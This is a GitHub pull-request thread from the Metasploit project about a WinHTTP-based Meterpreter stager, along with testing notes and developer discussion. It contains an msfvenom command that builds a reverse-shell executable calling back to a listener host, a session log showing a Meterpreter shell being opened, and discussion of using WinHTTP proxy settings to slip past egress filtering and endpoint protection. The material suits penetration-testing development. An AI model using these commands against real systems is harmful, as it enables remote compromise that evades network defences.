HTTP stager based on WinHttp

[BorjaMerino]

This is an adaptation from the @hmoore-r7 stager (based on WinINET) to WinHTTP; useful to bypass a lot of filtering.
I will create another PR for the HTTPS version since I'm getting some errors I have to solve first.

Tested in Win 7 32/64

EJ:
./msfvenom -p windows/meterpreter/reverse_winhttp_http LHOST=192.168.1.34 LPORT=8080 -f exe >winhttp8080.exe

C:\>netsh winhttp import proxy source =ie

Configuración actual del proxy WinHTTP:

    Servidores proxy:  192.168.1.34:3128
    Lista de omisión    :  (ninguna)

msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > set lhost 192.168.1.34
lhost => 192.168.1.34
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Starting the payload handler...
[*] 192.168.1.34:36763 Request received for /sLXE...
[*] 192.168.1.34:36763 Staging connection for target /sLXE received...
[*] Meterpreter session 1 opened (192.168.1.34:8080 -> 192.168.1.34:36763) at 2015-01-19 12:52:58 +0100

meterpreter > getproxy 
Auto-detect     : No
Auto config URL : 
Proxy URL       : 192.168.1.34:3128
Proxy Bypass    :

[BorjaMerino]

Ops! need to update spec/modules/payloads_spec.rb ...

[thelightcosine]

@BorjaMerino when you say useful for bypassing filtering do you mean recognition of the payload itself, or that somehow WinHTTP actually helps you bypass filtering of the traffic?

[BorjaMerino]

@dmaloney-r7 I did not explain myself very well, sorry. I mean that the payload could be useful
for certain scenarios. For example, a server where all outbound traffic is blocked except for the
WinHTTP default proxy settings (which is not based on the WinINet proxy settings).
Since many services rely on WinHTTP (for example WindowsUpdates to download patches) is likely that using these settings we could reach the handler.

[hdm]

WinInet is filtered by endpoint protection products as well (where WinHTTP may not be).

[hdm]

@BorjaMerino the staging is part of it, but we would need to implement a WinHTTP transport for meterpreter for that test case to be valid (in the example above, the stager is using WinHTTP but the payload is using WinInet).

[BorjaMerino]

@hmoore-r7 yes, of course. I did not find any stage working with WinHTTP so I use meterpreter just to show that the stager works. In the meantime, the stager could be useful if someone has its own reflectiveDLL/stage using WinHTTP .

[thelightcosine]

@BorjaMerino the stager works well on windows 7, but crashes on XP

[BorjaMerino]

@dmaloney-r7 thank you for testing. Could you give me more info about the crash. If I remember well I also checked it in XP SP3

[thelightcosine]

@BorjaMerino NO! you must suffer my terrible bug report and try to glean some meaning from it! =)

Sorry, tested on Windows XP SP0 , English
tested with both psexec and ms08-067
I can send you a zip with the crash dump if you'd like

[kernelsmith]

XP SP0, dear god, nothing works on that ;)

On Feb 18, 2015, at 11:52 AM, dmaloney-r7 notifications@github.com wrote:

@BorjaMerino https://github.com/BorjaMerino NO! you must suffer my terrible bug report and try to glean some meaning from it! =)

Sorry, tested on Windows XP SP0 , English
tested with both psexec and ms08-067
I can send you a zip with the crash dump if you'd like

—
Reply to this email directly or view it on GitHub #4608 (comment).

[thelightcosine]

@kernelsmith aside from all of our other stagers and payloads you mean?

[BorjaMerino]

@dmaloney-r7 xDDDD I will try it with a SP0. Thank you :)

[kernelsmith]

no, not what I meant.

On Feb 18, 2015, at 2:31 PM, dmaloney-r7 notifications@github.com wrote:

@kernelsmith https://github.com/kernelsmith aside from all of our other stagers and payloads you mean?

—
Reply to this email directly or view it on GitHub #4608 (comment).

[BorjaMerino]

@dmaloney-r7 sorry for the delay :p.
Windows XP SP0 does not support WinHTTP 5.1. Take a look at this information from Microsoft(https://msdn.microsoft.com/en-us/library/windows/desktop/aa384276%28v=vs.85%29.aspx):

With version 5.1, WinHTTP is an operating-system component of the following operating systems:
Windows 2000, Service Pack 3 and later (except Datacenter Server)
Windows XP with Service Pack 1 (SP1) and later
Windows Server 2003 with Service Pack 1 (SP1) and later

[hdm]

Grabbing this one because it lines up with some other planned work. We have too many HTTP stagers right now and I plan to consolidate these into newer "complex" payloads that are runtime configurable. This PR is a great start on WinHTTP support, but doesn't support SSL, nor the other use cases (proxy, proxy pstore, etc). It would make more sense to combine this into a bigger effort.

[hdm]

Marking delayed since this is part of #4895

[hdm]

@BorjaMerino I am using this PR as a base for WinHTTP stagers. You can follow the development on my branch. Thank you for your work on this, I will close out this PR once the new one is ready for testing.

[BorjaMerino]

@hmoore-r7 you are super welcome :)

[hdm]

Putting this on hold until #4904 is merged, since I plan to reuse the blockapi/exitfunk code from that changeset.

[hdm]

Replaced by #4914